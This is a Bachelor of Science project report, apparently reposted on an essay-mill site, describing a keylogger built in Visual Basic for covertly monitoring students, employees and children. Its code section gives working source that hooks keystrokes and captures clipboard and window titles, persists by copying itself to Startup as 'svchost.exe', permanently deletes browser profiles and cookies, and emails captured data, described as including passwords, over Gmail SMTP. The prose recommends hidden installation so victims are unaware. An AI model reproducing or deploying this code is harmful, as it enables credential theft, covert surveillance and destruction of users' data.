THAKUR By MS. POOJA GUPTA Bachelor of Science

THAKUR COLLEGE OF SCIENCE & COMMERCETHAKUR VILLAGE, KANDIVALI (EAST) MUMBAI PROJECT REPORT692150105410OnKEY LOGGERForREVOLUTERS FOUNDATION58 E WING ROOM NO: 1504 EKTA NAGAR MAHADA, KNADIVALI (WEST),MUMBAI, 400067.Designed & DevelopedBy MS. POOJA GUPTA Bachelor of Science (Computer Science)45720106680UNIVERSITY OF MUMBAITHAKUR COLLEGE OF SCIENCE & COMMERCETHAKUR VILLAGE, KANDIVALI (EAST) ,MUMBAI Academic Year 2018-20191Certificate From College10610851000125Thakur Degree College of Science & Commerce Shyamnarayan Thakur Marg, Thakur VillageKandivali (E), Mumbai – 400 101-22860017780000DATE: 4782185-889000COMPUTER DEPARTMENT(2018-2019)Certificate of ApprovalThis is to certify that the project work entitled “KEY – LOGGER” is prepared by MS. POOJA GUPTA, a student of “Third Year Bachelor Of Science (Computer Science)” course of University of Mumbai, which is conducted by our college.This is the original study work and important sources used have been duly acknowledged in the report.

The report is submitted in partial fulfilment of B.SC. (Computer Science) course as per rules of University of Mumbai.401828086550500-14287586423500Project Guide19805658382000head of departmentExternal ExaminerINDEXSr. No Index Topic Page Acknowledgement I.

We Will Write a Custom Essay Specifically
For You For Only $13.90/page!


order now

Preliminary Investigation (i) Description of System (ii) Limitations of present system (iii) Proposed system and its advantages (iv) System Requirements II System Analysis (i) Fact Finding Techniques (ii) Event Table (iii) Use Case Diagram (iv) Activity Diagram (v) Class Diagram (vi) Object Diagram (vii) Sequence Diagram (viii) Entity relationship diagram (ix) Sate chart diagram (iii) System design (i) Component diagram (ii) Deployment diagram (iv) System implementation (i) Code implementation V System Implementation VI Future Enhancement VII References and Bibliography ACKNOWLEDGEMENTAchievement is finding out what you would be doing rather than what you have to do. It is not until you undertake such a project that you realize how much effort and hard work it really is, what your capabilities are and how well you can present yourself or other things. It tells us how much we rely on the efforts and good will of others. It gives me immense pleasure to present this report towards the fulfillment of my project.

It has been rightly said that we are built on the shoulders of others. For everything I have achieved, the credit goes to all those who had helped me to complete this project successfully.I take this opportunity to express my profound gratitude to the management of Thakur Degree College of Science & Commerce for giving me this opportunity to accomplish this project work.I am very much thankful to Dr. C. T. Chakraborty, Principal of Thakur College for their kind co-operation in the completion of my project.

A special vote of thanks to my faculty, Mr.Mahesh Gurunani our project guides and also our HOD Mr. Ashish Trivedi & his most sincere, useful and encouraging contribution throughout the project span.Finally, I would like to thank all my friends & the entire Computer Science department who directly or indirectly helped me in completion of this project & to my family without whose support, motivation & encouragement this would not have been possible.

(POOJA GUPTA)PreliminaryInvestigationOrganizational OverviewName: Thakur College Of Science & CommerceAddress: Thakur Village, kandivali (East) Mumbai – 400101 Contacts: 022-2846 2565 / 2887 0627HistoryThakur Junior College was established in 1992, by the founding members, with the notion of providing an avenue of learning within easy reach to the growing young population of kandivali and its vicinity. It was a natural augmentation by the Thakur Educational Trust, for the S.S.C. Pass-out students of the various schools as well as Thakur Vidya Mandir. Thakur College had a humble beginning with only 57 students in FYJC first batch of Commerce stream. Its success led to the commencement of the Junior Science stream and the Degree College in 1997 followed by the Post Graduate section in 2002.

Our college has accomplished a spectacular growth over the last two decades of its journey towards excellence in Education and emerged as a leading Higher Educational Institution in Mumbai. The present total strength of our Degree College Science & Commerce is 7587 and the Junior Section is of 5867 students. The College has consistently attained outstanding results in academics at both Degree & Junior levels.

DESCRIPTION OF SYSTEMA key logger is a technology that tracks and records consecutive key strokes on a keyboard. Because sensitive information such as usernames and passwords are often entered on a keyboard, a key logger can be a very dangerous technology. Key loggers are often part of malware, spyware or an external virus.

Key loggers are most often used for the purpose of stealing the password and other confidential information.Not only it can store the key stroke that you type from your laptop or your pc but also it can store all the information of system that you require.There are many different kinds of key loggers based on diverse key logging methods. These include hardware and software key loggers.LIMITATION OF PRESENT SYSTEM1.

current system is based on storing the each keys which you type on system and send it to the exact location that sometimes makes a user difficult to understand the meaning of the gathered keys.2.Most of the time , key logger can be detected by virus scanner and other such apps.3.

A software key logger can send you data or records every time when the victim opens his /her system which means you will be getting records continuously that can be difficult for the person to get the important information. DISADVANTAGES OF KEY-LOGGER1.The first issue is legality not all jurisdictions allow for the use of software key loggers whether in the home or the workplace.it is vital that you ensure that using a software key logger is legal in your jurisdiction, and in the event of use in a business ,you really must consult with an HR professional.2.A second disadvantage relates to the impact upon computer or network performance. anything other than a high quality software key logger will have an impact on computer performance and the experience of the user.

3.As a software key logger is recording every action on the computer ,this will slow down the speed at which the keystrokes or mouse clicks can be executed .4.There is also the issue of computer crashes and unexpected pc operations which can affect productivity or interfere with normal operation.5. Many software key loggers will not be able to maintain the processing speed required for a good user experience which means the user cannot see that a software key logger is being used in Keystroke logging, also known as key logging which basically stores the keystrokes from systemthe first instance.PROPOSED SYSTEMThis key logger not only stores the keystrokes from system, but it also stores the other information of the particular pc ,laptop or any other system.It works on time interval and email ,here you can set the time in second ,in minute or an hour and you can get the information in your email that you have put in your code.

If you don’t want to get the data all the time in your email then put time interval in an hour so that it will only give information in an hour like what activities happened in one hour on that particular system in which you have installed the key logger.BENEFITS OF KEY-LOGGER1.Key logger can provide all the important information which you want from anyone’s system.2.It can be both software key logger or hardware key logger ,software key logger can be helpful for any parents or any organization.3 .  A good key logger software program will be easy to install and will run in the background, so the user does not even know that the key logging software has even been installed.4.

Using this, the information can directly go to the place where you want to receive your data such as email ,mobile ,etc.5. Key loggers can be used in your homes to monitor the online activities of your kids or teenagers.6.You can use a key logger on your personal computer to understand how it actually works and what mistakes you need to avoid in order to prevent yourself from getting into a trap.7. key loggers are very much used in offices to monitor the activities of the employees. This is basically done to ensure that the employees are using the company’s resources as intended and not doing anything else on pc or system.

SYSTEM REQUIREMENTSHARDWARE REQUIREMENTSX64 bit Processor4 GB RAM221 GB Hard DiskColoured PrinterINTERNETSOFTWARE RESOURCESOperating systemWindows XP 8Programming LanguageVisual BasicVISUAL BASICVisual Basic (or VB) is a programming language developed by Microsoft that runs on the .Net Framework. With Visual Basic you can build Windows applications, web applications and Windows phone applications. Programs developed in Visual Basic will only run on a Windows Operating System. Visual Basic is easy to learn, fun and powerful! Visual Basic has a very simple programming syntax. The language is not case-sensitive and it is designed for people new to the programming world, making it a good place to start. Module Module1 Sub Main() End SubEnd ModuleYour code goes between the Sub Main() and End Sub. In VB, lines does not end with a semi-colon; compared to C# and most other languages, VB is kept simple!CommentsSingle line comments start with an apostrophe (‘)There are no block comments in VBXML comments start with three apostrophes; these are useful for documentation purposesADVANTAGES OF VISUAL BASICThere are many advantages of visual basic1.

The structure of the visual basic programming language is very simple, particularly as to the executable code.2.Vb is not only a language but also an integrated, interactive development environment(“IDE”).

3.Vb provides a comprehensive interactive and context-sensitive online help system.4. COM components can be written in different languages and then integrated using Vb5.Vb is a component integration language which is attuned to Microsoft’s Component Object Model (“COM”).6.There is a wealth of readily available COM components for many different purposes.

7.You can find many tools (Sharewares and Freewares) on the internet that will Spare you some programming time.8. It’s simple language. Things that may be difficult to program with other language can be done in Visual Basic very easily.SYSTEM ANALYSISFACT FINDING TECHNIQUEIn Thakur college of commerce and science where n no of students take admission every year in various courses.This application will be useful for teachers to maintain our pc’s or systems from the students or others.

 Keyboard capturing, is the action of recording (logging) the keys ,so that the person using the keyboard is unaware that their actions are being monitored. Data can then be retrieved by the person operating the logging program.  Keystroke logging is now an established research method for the study of writing processes.

 Different programs have been developed to collect online process data of writing activities.Keystroke logging is legitimately used as a suitable research instrument in a number of writing contexts. These include studies on cognitive writing processes, which includeDescriptions of writing strategies; the writing development of children.First and second language writing, and spelling.

Keystroke logging can be used to research writing, specifically. It can also be integrated in educational domains for second language learning, programming skills, and typing skills.In our college, Thakur college of commerce and science teachers can also use this application to keep an eye on students.

When system is being used by students, they often try to misuse it , so teacher can install this application on system and they will be able to know that the students are using the particular pc for study purpose only and can make sure they are not misusing it. EVENT TABLEEVENT TRIGGER SOURCE RESPONSE ACTIVITY DESTINATIONGet window title Getting windowTitle system Captured title Title sent emailGet images Getting images system Captured imagesImages sent emailGet videos Getting videos system Captured videos Videos sent emailGet messages Getting messagessystem Captured messages Messages sent emailGet password Getting password system captured password Passwords sent emailGet confidential records Getting records systemCaptured records Records sent emailGet sites Getting sites system Captured sites Sites sent emailUSE CASE DIAGRAM5ACTIVITY DIAGRAMCLASS DIAGRAMOBJECT DIAGRAMSEQUENTIAL DIAGRAMENTITY RELATIONSHIP DIAGRAMSTATE CHART DIAGRAMSYSTEM DESIGNCOMPONENT DIAGRAMDeployement diagramSYSTEM IMPLEMENTATIONCODE IMPLEMENTATIONImports System.IOImports System.TextImports System.ComponentModelImports System.Net.

MailPublic Class Form1 Dim WithEvents K As New Keyboard Private Declare Function GetForegroundWindow Lib “user32.dll” () As Int32 Private Declare Function GetWindowText Lib “user32.dll” Alias “GetWindowTextA” (ByVal hwnd As Int32, ByVal lpString As String, ByVal cch As Int32) As Int32 Dim strin As String = Nothing Private Sub KeyboardLanguages() For index = 0 To InputLanguage.InstalledInputLanguages.Count – 1 Step 1 TextBox2.Text = InputLanguage.

InstalledInputLanguages.Item(index).LayoutName.ToString + TextBox2.Text Next End Sub Private Function GetActiveWindowTitle() As String Dim MyStr As String MyStr = New String(Chr(0), 100) GetWindowText(GetForegroundWindow, MyStr, 100) MyStr = MyStr.

Substring(0, InStr(MyStr, Chr(0)) – 1) Return MyStr End Function Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick If strin ;; GetActiveWindowTitle() Then TextBox1.Text = TextBox1.

Text + vbNewLine + vbNewLine + “” + GetActiveWindowTitle() + “” + vbNewLine + “—>” + Clipboard.GetText.ToString + “<—” + vbNewLine + vbNewLine strin = GetActiveWindowTitle() End If End Sub Private Sub K_Down(ByVal Key As String) Handles K.Down TextBox1.Text ;= Key End Sub Private Sub Timer3_Tick(ByVal sender As System.Object, ByVal e As System.

EventArgs) Handles Timer3.Tick ‘Window startup User Try Dim file1 As String = Application.ExecutablePath Dim copy1 As String = “C:Users” + Environment.UserName.ToString + “AppDataRoamingMicrosoftStart MenuprogramsStartupsvchost.

exe” If File.Exists(copy1) Then Else System.IO.File.

Copy(file1, copy1) End If Catch ex As Exception End Try End Sub Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load KeyboardLanguages() Select Case (My.Settings.browser) Case 0 My.

Settings.browser = 1 My.Settings.Save() My.Settings.

Reload() Case 1 Timer4.Start() Case 2 Case Else End Select TextBox1.Text = Now() + vbNewLine + vbNewLine Try Dim myprocess As New Process() myprocess.StartInfo.UseShellExecute = False myprocess.StartInfo.

RedirectStandardOutput = True Try myprocess.StartInfo.FileName = “ipconfig” myprocess.

StartInfo.Arguments = “/all” myprocess.StartInfo.

CreateNoWindow = True myprocess.Start() TextBox1.Text = TextBox1.Text + Replace(myprocess.StandardOutput.ReadToEnd(), Chr(13) & Chr(13), Chr(13)) myprocess.

WaitForExit() Catch ex As Win32Exception End Try Catch ex As Exception End Try Try TextBox1.Text = vbNewLine + vbNewLine + TextBox1.Text + vbNewLine + vbNewLine + “User Name: ” + Environment.UserName.ToString TextBox1.

Text = TextBox1.Text + vbNewLine + “Computer name: ” + Environment.MachineName.ToString TextBox1.Text = TextBox1.Text + vbNewLine + “Screen: ” + My.

Computer.Screen.WorkingArea.ToString TextBox1.

Text = TextBox1.Text + vbNewLine + “OS Version ” + Environment.OSVersion.ToString TextBox1.

Text = TextBox1.Text + vbNewLine + “Run Time: ” + Environment.Version.ToString TextBox1.Text = TextBox1.Text + vbNewLine + “System Root: ” + Environment.

SystemDirectory.ToString TextBox1.Text = TextBox1.Text + vbNewLine + “User Domain Name: ” + Environment.UserName.ToString TextBox1.Text = TextBox1.

Text + vbNewLine + “Total Physical Memory: ” + My.Computer.Info.

TotalPhysicalMemory.ToString TextBox1.Text = TextBox1.Text + vbNewLine + “Remain Physical Memory: ” + My.

Computer.Info.AvailablePhysicalMemory.ToString K.

CreateHook() Timer1.Start() Timer2.Start() Catch ex As Exception End Try End Sub Private Sub Timer4_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer4.

Tick ‘ Window ‘ Mozilla deletes folder and .ini file Try My.Computer.FileSystem.DeleteDirectory(“C:Users” + Environment.UserName.ToString + “AppDataRoamingMozillaFirefoxProfiles”, FileIO.

UIOption.OnlyErrorDialogs, FileIO.RecycleOption.DeletePermanently) System.IO.File.Delete(“C:Users” + Environment.UserName.ToString + “AppDataRoamingMozillaFirefoxprofile.ini”) Catch ex As Exception End Try ‘Chrome deletes folder Try My.Computer.FileSystem.DeleteDirectory(“C:Users” + Environment.UserName.ToString + “AppDataLocalGoogleChromeUser Data”, FileIO.UIOption.OnlyErrorDialogs, FileIO.RecycleOption.DeletePermanently) Catch ex As Exception End Try ‘IE deletes folder Try My.Computer.FileSystem.DeleteDirectory(“C:Users” + Environment.UserName.ToString + “AppDataRoamingMicrosoftWindowsCookies”, FileIO.UIOption.OnlyErrorDialogs, FileIO.RecycleOption.DeletePermanently) Catch ex As Exception End Try ‘Opera deletes folder Try My.Computer.FileSystem.DeleteDirectory(“C:Users” + Environment.UserName.ToString + “AppDataRoamingOpera”, FileIO.RecycleOption.DeletePermanently) Catch ex As Exception End Try My.Settings.browser = 2 My.Settings.Save() My.Settings.Reload() Timer4.Stop() End Sub Private Sub Form1_FormClosing(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.FormClosing Try Dim MyMailMessage As New MailMessage() MyMailMessage.From = New MailAddress(“[email protected]”) MyMailMessage.To.Add(“[email protected]”) MyMailMessage.Subject = Environment.UserName.ToString + “Turned Off Part: ” + My.Settings.part.ToString MyMailMessage.Body = TextBox1.Text Dim SMTPServer As New SmtpClient(“smtp.gmail.com”) SMTPServer.Port = 587 SMTPServer.Credentials = New System.Net.NetworkCredential(“[email protected]”, “[email protected]”) SMTPServer.EnableSsl = True SMTPServer.Send(MyMailMessage) Catch ex As Exception End Try My.Settings.part = My.Settings.part + 1 My.Settings.Save() My.Settings.Reload() End Sub Private Sub Timer2_Tick(sender As Object, e As EventArgs) Handles Timer2.Tick Try Timer1.Stop() Dim MyMailMessage As New MailMessage() MyMailMessage.From = New MailAddress(“[email protected]”) MyMailMessage.To.Add(“[email protected]”) MyMailMessage.Subject = Environment.UserName.ToString + ” Part:” + My.Settings.part.ToString + TextBox2.Text MyMailMessage.Body = “compare info:” + My.Computer.Info.InstalledUICulture.CompareInfo.ToString + vbNewLine + “Display Name: ” + My.Computer.Info.InstalledUICulture.DisplayName.ToString + vbNewLine + “English Name: ” + My.Computer.Info.InstalledUICulture.EnglishName.ToString + vbNewLine + “Left Language tag: ” + My.Computer.Info.InstalledUICulture.IetfLanguageTag.ToString + vbNewLine + “Name: ” + My.Computer.Info.InstalledUICulture.Name.ToString + vbNewLine + “Native Name: ” + My.Computer.Info.InstalledUICulture.NativeName.ToString + vbNewLine + “Text info: ” + My.Computer.Info.InstalledUICulture.TextInfo.ToString + vbNewLine + “3 Letter ISO Language Name: ” + My.Computer.Info.InstalledUICulture.ThreeLetterISOLanguageName.ToString + vbNewLine + “3 Letter Windows language Name: ” + My.Computer.Info.InstalledUICulture.ThreeLetterWindowsLanguageName.ToString + vbNewLine + “2 Letter ISO Language name: ” + My.Computer.Info.InstalledUICulture.TwoLetterISOLanguageName.ToString + vbNewLine + vbNewLine + vbNewLine + TextBox1.Text Dim SMTPServer As New SmtpClient(“smtp.gmail.com”) SMTPServer.Port = 587 SMTPServer.Credentials = New System.Net.NetworkCredential(“[email protected]”, “[email protected]”) SMTPServer.EnableSsl = True SMTPServer.Send(MyMailMessage) TextBox1.Clear() Timer1.Start() Catch ex As Exception End Try My.Settings.part = My.Settings.part + 1 My.Settings.Save() My.Settings.Reload() End SubEnd ClassSoftware Implementation/UploadingThe software made for keystrokes capturingBefore implementing the software the organization’s system must be updated as per the requirement of the system.The hardware configuration of the organization’s system must constitute of:X64 bit Processor4 GB RAM221 GB Hard DiskColoured PrinterThe software configuration of the organization’s system must constitute of:Visual basicweb serverAfter completing the above process, the software is ready to work with systems.Future enhancementFollowing future enhancement are possible of key logger1)Nowadays where many crimes are taking place one such example of these crimes can be FACEBOOK ,this software can be used there. 2)Any company or an organization can use the keylogger to keep an eye on employees.3)Many parents can use this software,in their children’s pc to see what he/she is doing.4)this software can be used in any school or any college where systems are being used by students. Refrences And BibliographyI referred to the following book for documentation for my project:NAME OF THE BOOK:1)Learning Visual Basic .Net2)Programming with Microsoft Visual Basic 2015INTERNET REFERENCES:Reference taken from google.Reference taken from You Tube Videos.Reference taken from tutorial points.